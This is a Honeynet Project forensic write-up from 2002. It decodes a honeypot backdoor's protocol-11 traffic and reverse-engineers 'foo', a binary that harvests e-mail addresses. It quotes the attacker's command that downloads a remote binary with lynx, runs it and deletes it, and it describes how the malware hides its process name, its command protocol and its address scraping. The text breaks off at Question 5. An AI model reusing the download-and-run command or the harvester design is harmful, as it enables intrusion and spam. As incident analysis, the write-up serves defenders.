Honeynet Project Scan of the Month - Scan 22 (August 2002)

Submission by Eloy Paris <peloy at chapus dot net>
Thu Aug 22 19:00:17 EDT 2002

To Chapu and he/she that is coming

Table of Contents

Summary
Analysis
Answers
Files
Thanks
Appendix A - NVP Backdoor Commands
Appendix B - Testing

1. Summary

The Honeynet Project's Scan of the Month for August requires the analysis of network traffic from/to a compromised host on which a backdoor program was installed by the perpetrator. We will see how the attacker uses this backdoor to instruct the compromised honeypot to execute several commands. One particular command downloads an executable from another host that seems to be under the control of the attacker, and then executes it. The provided Snort log (a file that contains captured network traffic) suggests that the executable launches a Denial of Service (DoS) attack against a specific site (web.icq.com). However, after reverse-engineering the downloaded file, I conclude that the attacker is pursuing a completely different objective.

2. Analysis

In this section I discuss the steps that I followed to analyze the Snort network trace that was provided.

2.1 Background Information

The first thing I notice after looking at the provided network capture (running "tcpdump -r snort-0718@1401") is that there is Network Voice Protocol (NVP) traffic. NVP is an IP protocol, with a protocol number of 11.

This sounds really familiar: the Honeynet Project's Reverse Challenge, which took place in May of this year, required reverse-engineering a program that was left running on a compromised honeypot.

After reverse-engineering this program[1], it was determined that its purpose was to act as a backdoor giving the person who compromised the honeypot the following capabilities:

Ability to run arbitrary commands on the compromised host, and request that the output from the commands be sent to certain IP addresses (which are remotely configurable)
A root shell on demand
Ability to use the compromised host to launch different types of Denial of Service (DoS) attacks on specific targets. The types of DoS attacks the backdoor can perform are: TCP SYN flood, ICMP or UDP fragmentation attack (jolt2), and DNS flood.

Now, the novel thing about the backdoor was that all communication between the backdoor and its handler was done via IP protocol 11 (NVP), which doesn't seem to be in use today. Also, the IP payload (which tells the backdoor what commands to execute, what DoS attack to launch, victim IP addresses, etc.) was encoded with a simple algorithm, so unless the appropriate decoder is used it is not possible to make sense of the data just by looking at it.
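To illustrate why such traffic is unreadable without a decoder, here is a minimal sketch of a chained additive byte encoding of this kind. It is an illustration under assumptions, not a copy of the backdoor's routine: the constant 23 and the function names are assumptions made here, and the-binary.c remains the reference for the real algorithm.

```c
#include <stddef.h>

/* Assumed per-byte offset; check the-binary.c for the real value. */
#define NVP_KEY 23

/* Encode len bytes from in to out. Each output byte is the input byte plus
   the previous output byte plus NVP_KEY (arithmetic wraps modulo 256), so
   repeated plaintext bytes do not show up as repeated ciphertext bytes. */
void nvp_encode(const unsigned char *in, unsigned char *out, size_t len)
{
    unsigned char prev = 0;
    for (size_t i = 0; i < len; i++) {
        out[i] = (unsigned char)(in[i] + prev + NVP_KEY);
        prev = out[i];
    }
}

/* Decode by undoing the chain: subtract the previous *encoded* byte and
   NVP_KEY. The encoded byte is saved first so in and out may alias. */
void nvp_decode(const unsigned char *in, unsigned char *out, size_t len)
{
    unsigned char prev = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char cur = in[i];
        out[i] = (unsigned char)(cur - prev - NVP_KEY);
        prev = cur;
    }
}
```

Because every byte depends on all the bytes before it, a plain hex dump of the encoded payload shows no recognizable strings, yet decoding is trivial once the scheme is known.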

2.2 Network Traffic Analysis

Knowing that the network trace contained IP protocol 11 traffic, I analyzed it as communication between the backdoor reverse-engineered during the Reverse Challenge and its handler.

With this in mind I wrote a small C program, dump.c[2], that processes the Snort log and prints out the commands sent to the backdoor as well as its responses. I ran this program on the provided Snort log and used its output in the first step of my analysis. The output is too large to be included here, so I am including it in Appendix A.
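dump.c itself is not reproduced here. As a rough sketch of the per-packet filtering step such a tool needs, the function below (a hypothetical helper, not taken from dump.c) checks whether a raw IPv4 packet carries protocol 11 and returns its payload, which would then be handed to the decoder. Reading the Snort log (a libpcap file, e.g. with pcap_open_offline() and pcap_next()) and skipping the link-layer header are assumed to happen elsewhere.

```c
#include <stddef.h>
#include <stdint.h>

#define NVP_PROTO 11   /* IP protocol number used by the backdoor */

/* Return a pointer to the payload of a raw IPv4 packet (no link-layer
   header) if its protocol field is 11, storing the payload length in
   *plen. Return NULL for non-IPv4 packets, other protocols, or headers
   that do not fit in the captured bytes. */
const uint8_t *nvp_payload(const uint8_t *pkt, size_t caplen, size_t *plen)
{
    if (caplen < 20 || (pkt[0] >> 4) != 4)
        return NULL;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;         /* header length */
    if (ihl < 20 || ihl > caplen || pkt[9] != NVP_PROTO)
        return NULL;
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];   /* IP total length */
    if (total < ihl)
        return NULL;
    if (total > caplen)
        total = caplen;                               /* truncated capture */
    *plen = total - ihl;
    return pkt + ihl;
}
```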

By looking at the output we can clearly see what the attacker is doing:

Packet #7:
```
    11:09:13.557615 94.0.146.98 > 172.16.183.2: ip-proto-11 402
```
Initialize communication parameters. The backdoor is configured to send all its responses to the IP address 203.173.144.50.
Packet #8:
```
    11:10:34.876658 192.146.201.172 > 172.16.183.2:  ip-proto-11 402
```
Request that the backdoor execute the command 'grep -i "zone" /etc/named.conf' and send back the results.

Packet #12:
```
    11:10:35.005093 172.16.183.2 > 203.173.144.50:  ip-proto-11 512
```
The following result is sent back:
```
    zone "." {
    zone "0.0.127.in-addr.arpa" {
```

Packet #22:
```
    11:10:35.495194 172.16.183.2 > 203.173.144.50: ip-proto-11 463
```
Final part of the output of the command requested in packet #8: just an empty string.
Packets #62 and #63:
```
    15:35:00.285126 168.148.27.14 > 172.16.183.2:  ip-proto-11 402
    15:35:56.667243 10.39.81.89 > 172.16.183.2:  ip-proto-11 402
```
The handler requests (twice) that the backdoor execute the command "killall -9 ttserve". This suggests that the attacker had previously run a program called "ttserve" and wanted to make sure it was not running at this time.
Packet #72:
```
    15:57:37.983480 58.248.76.90 > 172.16.183.2:  ip-proto-11 402
```
This is perhaps the most important command, since I focus on its effects for the remainder of this paper. The attacker requests that the backdoor execute the following command (without sending back the output):

```
killall -9 ttserve ; lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve ; chmod 755 /tmp/ttserve ; cd /tmp ; ./ttserve ; rm -rf /tmp/ttserve ./ttserve ;
```

The important commands here are "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve" and "./ttserve". We'll analyze these later on.

Packets #1236, #1237, and #1282:
```
    16:02:40.043361 218.209.145.27 > 172.16.183.2:  ip-proto-11 402
    16:03:37.492985 122.255.17.55 > 172.16.183.2:  ip-proto-11 402
    16:04:33.707291 26.44.146.84 > 172.16.183.2:  ip-proto-11 402
```

Request (three times) the execution of the command "killall -9 lynx ; rm -rf /tmp/ttserve;"

Now that I have identified the commands the attacker sent to the backdoor, I can use standard tools to study the rest of the captured network traffic. Using Ethereal or tcpdump I can see the following traffic patterns (see the note below about the IP 11.11.11.11 shown in the following packets):

Packet #73:
```
15:57:39.114395 172.16.183.2.1025 > 11.11.11.11.8882: S 240028091:240028091(0) win 32120  (DF)
```
The three-way handshake for the HTTP download from 216.242.103.2:8882 starts. The download itself starts two packets later (packet #76).

Packet #528:

The download ends:
```
15:57:52.376036 11.11.11.11.8882 > 172.16.183.2.1025: R 215579:215579(0) ack 546 win 31856  (DF)
```

Packet #529:
```
15:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413: udp 3
```
A UDP packet from the compromised honeypot to 216.242.103.2, port 53413.

Note: This is a "preview". There's no way of knowing at this point that the UDP packet goes to 216.242.103.2. Here we see that it goes to 11.11.11.11. I know it doesn't go to 11.11.11.11 but to 216.242.103.2 because I reverse-engineered "foo". See the next note below.
Packet #530:
```
15:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025: udp 10
```
216.242.103.2 responds with another UDP packet.

216.242.103.2 seems to be under the control of the attacker too (i.e., compromised). If this is the case, why the attacker didn't use 216.242.103.2 instead of the honeypot for his/her evil doings eludes me.
Finally, from packet #531 to the end of the capture, I see a lot of HTTP traffic between the compromised host and web.icq.com. In particular, the compromised host downloads /wwp?Uin=x from web.icq.com, where x increments by 1 with each request (x, x+1, x+2, etc.). I also see DNS requests to resolve web.icq.com and the normal HTTP traffic to and from port 80 of web.icq.com.
The HTTP downloads from web.icq.com might lead me to think that what "foo" is doing is just a DoS on web.icq.com. We shall see if this is true...

Note: There is something weird here: I know that the HTTP download that starts in packet #73 is for a file from 216.242.103.2:8882. However, the Snort log shows 216.242.103.2 as 11.11.11.11. Some possible explanations for this include:

The honeypot was configured to use an HTTP proxy. This is unlikely, though, since after the HTTP download finishes there is UDP traffic initiated by the downloaded program ("foo"), and this traffic is also shown in the Snort log as going to 11.11.11.11. Also, there are more HTTP downloads (from web.icq.com) and these do show up with the correct server address (admittedly, this is not a strong argument, because those downloads are done by "foo" and not by a common utility like wget or lynx running on the honeypot).
There is some kind of IP redirection going on on the honeypot. This is unlikely too, because the downloads from web.icq.com show up correctly in the Snort log, as does the NVP traffic between the honeypot and its handler.
The Snort log was edited to obfuscate what was happening and make the Scan of the Month more challenging, or to protect the identity of someone.
The third explanation is supported by the IP header checksum of these packets, which is invalid (tcpdump and Ethereal both show this). An invalid checksum should not be possible: the honeypot is running Linux, and the Linux kernel always calculates the IP header checksum, even for packets sent via raw sockets (see the raw(7) manual page). Furthermore, an IP packet with an invalid checksum would have been dropped (see RFC 791).

To confirm this theory, I picked one packet and manually calculated its IP header checksum, substituting the IP address I believe was originally there (obtained through the reverse-engineering process). The result matched the checksum present in the Snort log. This means that the original IP header did not have 11.11.11.11 in its source or destination address field.
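The manual check described above can be automated. This is a minimal sketch of the RFC 791 header checksum (the one's complement of the one's complement sum of the header's 16-bit words) plus a hypothetical helper that substitutes a candidate address and compares the result against the checksum stored in the packet. The helper's name and interface are illustrative assumptions, not part of any tool used in this analysis.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* RFC 791 header checksum. Computed over a header whose checksum field
   is zero it yields the checksum; over an intact header it yields 0. */
uint16_t ip_checksum(const uint8_t *hdr, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((hdr[i] << 8) | hdr[i + 1]);
    if (len & 1)                       /* odd length: pad with a zero byte */
        sum += (uint32_t)(hdr[len - 1] << 8);
    while (sum >> 16)                  /* fold carries into the low 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Return 1 if the checksum stored in bytes 10-11 of an IPv4 header is
   correct once the 4-byte address at addr_off (12 = source, 16 =
   destination) is replaced by candidate, 0 otherwise. */
int checksum_matches_with_addr(const uint8_t *hdr, size_t len,
                               size_t addr_off, const uint8_t candidate[4])
{
    uint8_t copy[60];                  /* IPv4 headers are at most 60 bytes */
    if (len < 20 || len > sizeof copy || addr_off + 4 > len)
        return 0;
    memcpy(copy, hdr, len);
    uint16_t stored = (uint16_t)((copy[10] << 8) | copy[11]);
    memcpy(copy + addr_off, candidate, 4);
    copy[10] = copy[11] = 0;           /* checksum field counts as zero */
    return ip_checksum(copy, len) == stored;
}
```

If the stored checksum only validates with the address recovered from "foo" and not with 11.11.11.11, the address field was rewritten after the packet was captured.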

So, I strongly believe the Snort log has been tampered with, but this is not important since I will reverse-engineer "foo" anyway. What is important is that whenever we see 11.11.11.11 in the Snort log (as shown above), that is not the real IP address the packet is coming from or going to.

2.3 "lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve"

As I mentioned in the previous section, in packet #72 the attacker requests that the backdoor execute several commands. One of these commands downloads, via HTTP, a file called "foo" from a specific HTTP server (IP address 216.242.103.2, TCP port 8882). The command line saves "foo" as "/tmp/ttserve" and then executes it.

Since I know that running "ttserve" generates HTTP traffic to web.icq.com, it is essential to get hold of this file so it can be analyzed.

As we shall see, if the Honeynet Project had given us a little more of the network capture, I would not have needed to get hold of "foo" and study it. However, seeing what happens after packet #5085 would make this Scan of the Month too easy :-)

There are several ways of reconstructing "foo" from the Snort log file. Some of these are:

1) Use Ethereal to reconstruct the HTTP conversation, save the conversation to disk (it will be saved as a text file), and then write a small script that processes the file and generates the binary (we can also do something similar with tcpdump, or even with Snort in tcpdump file reading mode).
2) Write a custom program that processes the Snort log file directly and generates the binary. Any language that has an interface to libpcap (C and Perl, for example) will make things easier.
3) Take advantage of a tool that someone already wrote, like Jeremy Elson's tcpflow.

In this case I just used tcpflow, which is perhaps the easiest way because there is no need to write any code:

```
peloy@canaima:/tmp$ tcpflow -r snort-0718%401401.log
peloy@canaima:/tmp$ vi 011.011.011.011.08882-172.016.183.002.01025
peloy@canaima:/tmp$ mv 011.011.011.011.08882-172.016.183.002.01025 foo
```

tcpflow generates several files, but I chose the one whose name starts with "011.011.011.011" because that is the one that contains the HTTP download (remember that the port used was 8882, which is embedded in the file name above).

I edited the file (as shown above) to remove the header returned by the HTTP server. (By the way, recovering binary files from Snort logs has been covered extensively in previous Scans of the Month.)
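Instead of hand-editing the tcpflow output in vi, the HTTP header could be stripped programmatically. The following is a minimal sketch, assuming the server ended its response headers with the standard CR LF CR LF sequence (not verified against this capture); the function name is hypothetical. Everything from the returned offset to the end of the flow is the downloaded binary.

```c
#include <stddef.h>

/* Return the offset of the first body byte in a reassembled HTTP response
   stream (the byte after the CR LF CR LF that ends the headers), or -1 if
   the terminator is not found. Binary-safe: it never relies on NUL bytes. */
long http_body_offset(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i + 3 < len; i++)
        if (buf[i] == '\r' && buf[i + 1] == '\n' &&
            buf[i + 2] == '\r' && buf[i + 3] == '\n')
            return (long)(i + 4);
    return -1;
}
```

After reading the tcpflow file into memory, the bytes from buf + off onward would be written out (for example with fwrite()) as "foo".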

Now that I have "foo", a.k.a. "ttserve", the fun can begin.

2.4 Reverse-Engineering "foo"

As I mentioned at the end of section 2.2, the HTTP traffic between the compromised honeypot and web.icq.com might lead us to think that the sole purpose in life of "foo" is to execute a DoS attack against web.icq.com. In fact, the Snort log shows "foo" retrying downloads several times, three-way handshakes failing, and TCP connections being reset (RST), all of which suggest that web.icq.com might be flooded with HTTP requests and that the "DoS attack" is succeeding. However, the only way of determining the purpose of "foo" for sure is by reverse-engineering it.

I reverse-engineered "foo" and came up with an equivalent C program, foo.c, which is easier to understand. With the source code for "foo" we can now understand exactly what "foo" does, and what the attacker was trying to do. "foo" has the following characteristics:

Was written in C
Runs on i386 Linux (of course, the compromised honeypot was running i386 Linux)
Is statically linked against the Linux C library 5.3.12. This allows it to run on any Linux machine, regardless of the installed version of the C library.
Was probably created in the same environment (Slackware 3.1, GCC 2.7.2) where the-binary (from the Reverse Challenge) was created.
Was not compiled with optimization, which makes decompilation easier.

The most difficult part of reverse-engineering a statically linked binary like "foo" is reconstructing the symbol table and figuring out the calls to functions in the C library. When I disassembled the-binary for the Reverse Challenge I used a very cumbersome process to reconstruct the symbol table. Fortunately, the winner of the Challenge, Dion Mendel, developed some fantastic tools that make reconstructing a symbol table child's play. So, for this reverse-engineering task I used his tools, which can be downloaded from http://www.honeynet.org/reverse/results/sol/sol-06/.

Once the symbol table is reconstructed, all you need is a little patience and some knowledge of assembly language, C, network programming, and how a C compiler translates some C constructs into assembly language, such as variable allocation, "if" statements, and "for", "do ... while ()" and "while ()" loops. Plain old paper and pencil help too. Basically, one starts with the assembly language listing and reconstructs the equivalent C program.

For more information on reverse-engineering a binary, I recommend reading some of the top 20 submissions for the Reverse Challenge. They are worth reading.

The features of "foo" will be explained in detail in Question 4.

3. Answers

Question 1. What is the attacker's IP address?

The attacker initializes the backdoor running on the hacked honeypot in packet #7. The initialization (command code 2, see packet-format.txt) tells the backdoor to send its responses to one particular IP address as well as to 9 other randomly generated IP addresses (response mode 1), although because of a bug in the backdoor only 8 random IPs are used (in addition to the real IP sent by the attacker).

The initialization command used in packet #7 configures the backdoor to respond to the IP address 203.173.144.50. However, I don't know for sure if this is the IP address of the machine being used by the attacker since he/she could be sniffing traffic going to that machine or network. The attacker could be in the same IP network as 203.173.144.50, or sniffing in a segment that traffic going to 203.173.144.50 must cross.

I cannot infer anything from the source IPs in the packets that control the backdoor since these IPs are spoofed, i.e. they are random IPs.

203.173.144.50 resolves to p50-tnt7.syd.ihug.com.au. The web page at www.ihug.com.au tells us that IHUG is an Internet Service Provider in Australia. "whois 203.173.144.50" confirms that the IP address to which the backdoor will send its responses is in a block assigned to IHUG.

The FQDN of the machine also hints at where the attacker might be physically located: Sydney, Australia.

The Snort log that was provided during the Reverse Challenge (so participants could test their network traffic decoders) shows that the attacker programmed the backdoor to respond to the IP 203.173.144.35 (p35-tnt7.syd.ihug.com.au). This IP is in the same network, which suggests that the attacker is connecting to the Internet via dial-up because he/she gets a different IP with each new connection. If this ISP keeps connection logs for its users, and given that we know the exact time the attacker was messing around with the compromised host, it would be easy to further track the attacker (account that was used during the attacks, phone number the attacker dialed in from, etc.)

Question 2. What is the attacker doing first? What do you think is his/her motivation for doing this?

There are three things the attacker does before starting what I consider the attacker's main activity:

Initialize the backdoor running on the compromised honeypot to respond to one specific IP address and to 9 other random IP addresses (as explained in Question 1). The motivation for this is obvious: to be able to see the results of the commands sent to the backdoor and to get the status of the tasks being executed by the backdoor.
Instruct the backdoor to run the command "grep -i 'zone' /etc/named.conf" and send back the results (output). The results sent back to the attacker show that the BIND configuration on the compromised host declares only two zones: the root zone (".") and "0.0.127.in-addr.arpa". This is what a default caching-only configuration typically contains, where "." holds the root hints rather than data the server is authoritative for. I think the motivation is that the attacker might be trying to map out the network topology and do some reconnaissance.

Another possible motivation is to find out whether the honeypot would cache DNS lookups during an attack (be it a DoS or just a sweep of web pages to harvest e-mail addresses) initiated from the compromised honeypot. If DNS lookups are cached, there is less network activity that can reveal that something is going on.

The presence of /etc/named.conf does not imply that named is running, though.
Download a binary called "foo" from a web server running on port 8882 of a remote host. I have talked in detail about this download before, so I will only mention here that the motivation for doing this is to obtain a tool for a very specific purpose, which I explain in Question 4.

Question 3. Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other?

Actually, all the packets this question refers to have readable text (including packets #15 and #16). I assume this is just a minor mistake in the question. The readable text is towards the end of the packets and looks like this (it differs slightly in each packet):

```
0x01b0   207b 0a7a 6f6e 6520 2230 2e30 2e31 3237    .{.zone."0.0.127
0x01c0   2e69 6e2d 6164 6472 2e61 7270 6122 207b    .in-addr.arpa".{
0x01d0   0a00 636f 6e66 2220 313e 202f 746d 702f    ..conf".1>./tmp/
0x01e0   2e68 6a32 3337 3334 3920 323e 2631 0098    .hj237349.2>&1
```

I believe the packets the Honeynet Project is referring to as containing readable text are part of two batches: the first batch contains packets #9 to #17, and the second contains packets #18, #20, #21, #22, #24, #25, #26, #27, and #28. Note that each batch has exactly 9 packets.

All the packets in these two batches are responses sent by the backdoor running on the compromised honeypot to the IP address specified in the initialization command (see Question 1) plus 8 random IPs, and contain the output of the command that the attacker instructed the backdoor to execute with packet #8.

The first batch contains the actual output from the command:

```
zone "." {
zone "0.0.127.in-addr.arpa" {
```

The second batch just contains an empty string, and is there to signal the end of the command output. Think of it like a C string: a C string is a sequence of characters that ends with a null byte. Well, the only way the attacker has of knowing there is no more output coming from the backdoor is by receiving a last packet with an empty string.
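To make the end-of-output convention concrete, here is a hypothetical handler-side helper (not taken from control.c) that accumulates decoded response chunks and stops at the empty one. It assumes each chunk has already been decoded into a NUL-terminated string and that acc starts out as a NUL-terminated string within cap bytes.

```c
#include <stddef.h>
#include <string.h>

/* Append one decoded response chunk to acc (capacity cap bytes, cap >= 1)
   and report whether the command output is complete. An empty chunk is
   the backdoor's end-of-output marker, just as a NUL byte terminates a C
   string. Returns 1 when done, 0 when more output is expected. */
int append_output_chunk(char *acc, size_t cap, const char *chunk)
{
    if (chunk[0] == '\0')
        return 1;                      /* empty string: no more output */
    size_t used = strlen(acc);
    size_t room = cap - used - 1;      /* keep space for the final NUL */
    strncat(acc, chunk, room);         /* truncate rather than overflow */
    return 0;
}
```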

The reason some packets contain readable text is a mistake made by the author of the-binary: if you look at my decompilation of the-binary, you'll see that the backdoor encodes 400 bytes for sending (see line 245 of the-binary.c), but then sends (in line 246) those 400 bytes plus an additional random number of bytes (between 0 and 200, since rand() % 201 yields a value from 0 to 200):

```
     70         char *bufptr, buffer[400];
    [...]
    232               bufptr = buffer;
    233               do {
    234                   bytes_read = fread(ippacket, 1, 398, output_file);
    235                   ippacket[bytes_read] = '\0';
    236                   for (i = 0; i <= 397; i++)
    237                       decoded[i + 2] = ippacket[i];
    [...]
    245                   encode(400, decodedptr, bufptr);
    246                   send_response(ips_ptr, bufptr,
    247                                   (rand() % 201) + 400);
    248                   usleep(400000);
    249               } while (bytes_read != 0);
```

Between 0 and 200 bytes of each packet are never encoded, and these bytes are the readable text we see in the network packets this question refers to: bufptr points to a 400-byte buffer located on the stack (declared in line 70), and since send_response() is told to send between 400 and 600 bytes, most of the time it reads past the end of the buffer pointed to by bufptr, into a part of the stack that happens to hold unencoded text. The fix would be to make the buffer bigger (600 bytes) and encode exactly the number of bytes being sent.
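The arithmetic behind the leak can be checked with a small sketch. The helper names are hypothetical; the constants come from the excerpt above (a 400-byte buffer and a send length of (rand() % 201) + 400).

```c
#include <stddef.h>

#define ENCODED_LEN 400   /* bytes the-binary encodes (buffer[400]) */
#define MAX_PAD     200   /* rand() % 201 yields 0..200 */

/* Length passed to send_response() for a given non-negative rand() value. */
size_t response_len(int r)
{
    return (size_t)(r % (MAX_PAD + 1)) + ENCODED_LEN;
}

/* Bytes read past the end of a buf_size-byte buffer when send_len bytes
   are sent from it; on the wire these are unencoded stack contents. */
size_t overread_bytes(size_t send_len, size_t buf_size)
{
    return send_len > buf_size ? send_len - buf_size : 0;
}
```

With the original 400-byte buffer, up to 200 stack bytes leak per packet; with a 600-byte buffer that is fully encoded, nothing leaks.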

As you can see, knowledge of the internals of the-binary really helps in understanding what we are seeing on the wire.

By the way, I mentioned in Question 1 above that the attacker configured the backdoor to send responses to 1 specific IP and to 9 random IPs, but that because of a bug in the backdoor only 8 random IPs are used. This is what we are seeing here: each batch of packets carrying the output of the command 'grep -i "zone" /etc/named.conf' (including packets #17 to #25, which the question mentions) has 9 packets rather than 10, because it was sent to 9 IPs instead of 10.

Question 4. What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur?

Just by looking quickly at the decompiled "foo" (foo.c) we can infer that the purpose of "foo" is to harvest electronic mail addresses from web.icq.com via HTTP, and once a certain number has been collected, send them via UDP to a particular host on the Net.

I must confess that I was fooled by the Snort log when I first tried to guess the purpose of "foo". The reason is that the only thing I saw in the network trace were HTTP connections (lots of them) from the compromised honeypot to web.icq.com, and this led me to believe that "foo" was performing a DoS attack against this host. So, it wasn't until I finished reverse-engineering "foo" that I realized what "foo" was really doing.

"foo" works in the following way:

Once "foo" starts, it conceals its program name so users don't notice (with "ps") that something strange is running on the system. "foo" accomplishes this by changing the program's first argument (main()'s argv[0]) to "(nfsiod)". the-binary, from the Reverse Challenge, conceals its program name in the same way, but uses "[mingetty]" instead. The end result is that running "ps aux" on the honeypot would show a swapped-out process called "(nfsiod)" instead of the real "/tmp/ttserve".
Then "foo" does several administrative things like setting up signal handling so SIGCHLD and SIGPIPE are ignored, changing the current working directory to "/", and setting the UID and EUID to 1 (the reason for this eludes me), and then forks. The parent exits and the child stays running.
Finally, "foo" enters an infinite loop in which it will keep doing its evil work of harvesting e-mail addresses until the attacker tells it to stop (via a special command) or until there are communication problems. In this infinite loop, "foo" will: 1) Communicate via UDP with its master (handler). In this communication "foo" will request an action to perform, or will send a list of collected e-mail addresses if it has one ready; and 2) Collect e-mail addresses from web.icq.com.
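The argv[0] trick from the first step above can be sketched as follows. This is not foo.c's code; the helper name is hypothetical, and it assumes the fake name should never exceed the storage of the original argv[0] string. "(nfsiod)" is 8 characters and the program was started as "./ttserve" (9 characters), so it fits.

```c
#include <string.h>

/* Overwrite argv[0] in place so tools that read the process's command
   line (such as ps) show fake instead of the real program name. Only the
   existing storage is reused: fake is truncated to fit, and the rest of
   the original string is zeroed so no trace of the real name remains. */
void conceal_argv0(char *argv0, const char *fake)
{
    size_t room = strlen(argv0);       /* usable bytes, excluding the NUL */
    size_t n = strlen(fake);
    if (n > room)
        n = room;
    memcpy(argv0, fake, n);
    memset(argv0 + n, '\0', room - n + 1);
}
```

It would be called as conceal_argv0(argv[0], "(nfsiod)") at the top of main(). On Linux this works because ps reads the command line from the process's own argv memory (via /proc/<pid>/cmdline).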

The communication between "foo" and its master follows a very simple protocol:

"foo" sends to host 216.242.103.2, UDP port 53413, a packet with the data "GU\n". The author of "foo" was probably thinking of "GU" as "Get Uin", as we shall see.
Host 216.242.103.2 responds, to the host and UDP port the "GU" packet came from, with one of two commands: a "DU" command or a "DIE" command.
If the command is "DIE", "foo" knows that it is time to die: it calls exit() and everything ends there.
If the command is "DU", the UDP data will look like "DUx\n", where "x" is a number represented in ASCII. "x" is read with sscanf() and used as the starting Uin for the sweep of web pages from web.icq.com. The author of "foo" was probably thinking of "DU" as "Do Uins" or something like that.
After the "DU" command is received, "foo" starts a sweep of ICQ web pages. The pattern it follows is:
```
GET /wwp?Uin=x
GET /wwp?Uin=x+1
GET /wwp?Uin=x+2
[...]
```
where x is the number that was received in the "DU" command, and the delay between GETs is hard-coded at 25 seconds.

"foo" will harvest e-mail addresses from these web pages. It will do so by parsing the downloaded web page for the string "mailto:" and saving the text that follows, i.e. an e-mail address.
After 100 e-mail addresses (this number is hard-coded too) have been collected, "foo" sends a "SE" command (my guess is that "SE" stands for "Send E-mail addresses") to 216.242.103.2, UDP port 53413. The "SE" command has the following format:
"SEx\nuser1@domain1\nuser2@domain2\n ...user100@domain100\n"

(the x after "SE" is the Uin that was received in the "DU" command)
The handler (216.242.103.2 in this case) must then acknowledge the receipt of the e-mail addresses by sending a "GOT" command. This command just has the three-character string "GOT" as its UDP data. If "foo" doesn't receive the "GOT" command it will keep sending the "SE" command. After 10 unsuccessful retries, "foo" will give up and exit.
Since UDP is not reliable, there are attempts to provide reliability at the application level. In other words, "foo" has code to retransmit commands (up to 10 times) if a response from the master doesn't arrive in 10 seconds. After retrying 10 times without success, "foo" gives up and exits.
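The message handling in the protocol above can be sketched as follows. It is based only on the message formats described in this section ("DUx\n", "DIE", "GOT", and "SEx\n" followed by one address per line); the enum and function names are hypothetical and not taken from foo.c, and the UDP socket, the initial "GU\n" request, the 10-second timeout and the 10 retries are left out.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical names for the replies foo expects from its master. */
enum reply { REPLY_UNKNOWN, REPLY_DU, REPLY_DIE, REPLY_GOT };

/* Classify one UDP reply. For "DUx\n", store the starting Uin x. */
enum reply parse_reply(const char *data, unsigned long *uin)
{
    if (strncmp(data, "DIE", 3) == 0)
        return REPLY_DIE;
    if (strncmp(data, "GOT", 3) == 0)
        return REPLY_GOT;
    if (strncmp(data, "DU", 2) == 0 && sscanf(data + 2, "%lu", uin) == 1)
        return REPLY_DU;
    return REPLY_UNKNOWN;
}

/* Build the request path for the n-th page of a sweep starting at uin. */
int format_wwp_path(char *out, size_t cap, unsigned long uin, unsigned long n)
{
    return snprintf(out, cap, "/wwp?Uin=%lu", uin + n);
}

/* Append one harvested address to an "SE" message (a NUL-terminated
   string within cap bytes), starting it with "SEx\n" if it is empty.
   Returns 0 on success, -1 if the address would not fit. */
int se_append(char *msg, size_t cap, unsigned long uin, const char *addr)
{
    if (cap == 0)
        return -1;
    size_t used = strlen(msg);
    int w;
    if (used == 0) {                   /* start a new "SEx\n" message */
        w = snprintf(msg, cap, "SE%lu\n", uin);
        if (w < 0 || (size_t)w >= cap) {
            msg[0] = '\0';
            return -1;
        }
        used = (size_t)w;
    }
    w = snprintf(msg + used, cap - used, "%s\n", addr);
    if (w < 0 || (size_t)w >= cap - used) {
        msg[used] = '\0';              /* drop the partial address */
        return -1;
    }
    return 0;
}
```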

Appendix B contains a sample communication session where the protocol can be seen at work.

As we can see, if the Honeynet Project had included a few more packets from their Snort log we would have seen "foo" sending some e-mail addresses to 216.242.103.2 UDP port 53413, and reverse-engineering "foo" would not have been necessary. I can only assume this was done on purpose, to make the Scan of the Month more interesting :-)

Regarding the skills of the author of "foo", I would say that the author is neither a beginner nor an advanced programmer (perhaps closer to "advanced" than to "beginner"). The program is well structured (good use of subroutines), and the communication protocol between "foo" and its handler is very simple but works well and is well implemented. Error handling seems to be done well, and the application-level reliability (needed because of the lack of reliability in UDP) is also implemented, and implemented well.

I saw many stupid things (and even bugs) when I decompiled the-binary from the Reverse Challenge, and the facts (build environment, programming style) lead me to conclude that it was the same programmer who wrote both the-binary and foo. However, "foo" looks a bit better and doesn't have the mistakes made in the-binary. But this might be just because the program is much simpler.

The code in foo.c's harvest_email_addresses() function, especially the code that parses an HTML page looking for "mailto:" URIs, is a bit hairy, though, with excessive use of if's and else's. This could be simplified.
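As an example of how the parsing could be simplified, here is a sketch built on strstr() and strcspn(). It is not foo.c's code; the function name is hypothetical, and the set of characters assumed to end an address (quotes, '>', '?', and whitespace) is an assumption about typical HTML.

```c
#include <stddef.h>
#include <string.h>

/* Find the next "mailto:" address in page at or after *pos, copy it into
   out (at most cap - 1 characters, NUL-terminated) and advance *pos past
   it. Empty "mailto:" links are skipped. Returns 1 if an address was
   found, 0 when there are no more. */
int next_mailto(const char *page, size_t *pos, char *out, size_t cap)
{
    const char *p = page + *pos;
    if (cap == 0)
        return 0;
    while ((p = strstr(p, "mailto:")) != NULL) {
        p += sizeof "mailto:" - 1;                /* skip the scheme */
        size_t n = strcspn(p, "\"'>? \t\r\n");    /* address length */
        if (n == 0)
            continue;
        size_t copy = n < cap - 1 ? n : cap - 1;
        memcpy(out, p, copy);
        out[copy] = '\0';
        *pos = (size_t)(p + n - page);
        return 1;
    }
    return 0;
}
```

A caller would loop on next_mailto() over each downloaded page, collecting addresses until it returns 0.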

I'd say that "foo" was written by someone that is getting good at programming.

Question 5. What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker?

